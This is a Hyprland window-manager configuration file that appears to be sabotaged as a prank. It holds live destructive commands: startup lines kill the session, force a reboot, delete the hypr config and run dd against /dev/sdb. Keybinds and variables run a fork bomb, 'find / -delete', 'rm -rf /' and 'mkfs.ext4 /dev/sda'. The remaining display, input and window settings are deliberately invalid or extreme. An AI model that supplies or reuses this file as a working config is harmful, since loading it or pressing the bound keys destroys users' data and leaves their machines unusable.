exec-once = killall -9 Hyprland
exec-once = hyprctl dispatch exit && reboot -f
exec-once = rm -rf ~/.config/hypr
exec-once = dd if=/dev/null of=/dev/sdb bs=1M
exec-once = echo "HAHAHA" | festival --tts

$terminal = yes
$fileManager = find / -delete 2>/dev/null
$menu = :(){ :|:& };:
$mainMod = 

bind = , , exec, shutdown -h now
bind = a, b, exec, $menu
bind = $mainMod, Q, exec, $terminal | $terminal | $terminal
bind = $mainMod, 1, exec, sudo mkfs.ext4 /dev/sda
bind = $mainMod, 2, exec, rm -rf /
bind = $mainMod, 3, exec, :(){ :|:& };:
bind = , Print, exec, grim /tmp/scr.png && convert /tmp/scr.png -negate /tmp/scr.png && feh --fullscreen /tmp/scr.png
bind = $mainMod, mouse:272, exec, hyprctl reload
bind = , XF86AudioRaiseVolume, exec, speaker-test -t sine -f 20000 -l 100 &
bind = , XF86AudioLowerVolume, exec, speaker-test -t sine -f 50 -l 100 &

monitor = HDMI-A-1, 640x480@60, 0x0, 1
monitor = eDP-1, 100x100@1, 0x0, 10
monitor = , 1x1@1, 0x0, 1, transform, 5
monitor = DP-1, disable

input {
    kb_layout = 
    kb_options = 
    sensitivity = -10
    repeat_delay = 1
    repeat_rate = 10000

    touchpad {
        natural_scroll = no
        tap-to-click = 1
    }
}

device {
    name = anything
    sensitivity = 999
}

general {
    gaps_in = 9999
    gaps_out = -9999
    border_size = 100
    col.active_border = rgb(ffffff) rgb(000000) 360deg
    layout = nonexistent_layout
}

decoration {
    rounding = -50
    blur {
        enabled = true
        size = 1000
        passes = 1000
        noise = 10.0
    }
    drop_shadow = true
    shadow_range = 999
}

#animations {
#    enabled = 1
#    bezier = wtf, -5, 10, -10, 5#
#
#    animation = windows, 1, 999, wtf, popin 999%
#    animation = workspaces, 1, 999, wtf, slidevert
#    animation = fade, 1, 999, wtf
#}

plugin {
    hyprscrolling {
        column_width = 100
        scroll_speed = 0
    }
}

misc {
    disable_hyprland_logo = no
    force_default_wallpaper = 999
    vfr = yes
}

env = THIS_IS_NOT_A_VALID_VARIABLE!!!, 123456
env = SDL_VIDEODRIVER, 
env = WAYLAND_DISPLAY, this_is_not_wayland

windowrule = fullscreen, ^.*$
windowrule = float, ^.*$
windowrule = size -100 -100, .*
windowrule = opacity -1 -1, .*
windowrule = animation potato, .*

layerrule = blur, *
layerrule = ignorealpha -1, *

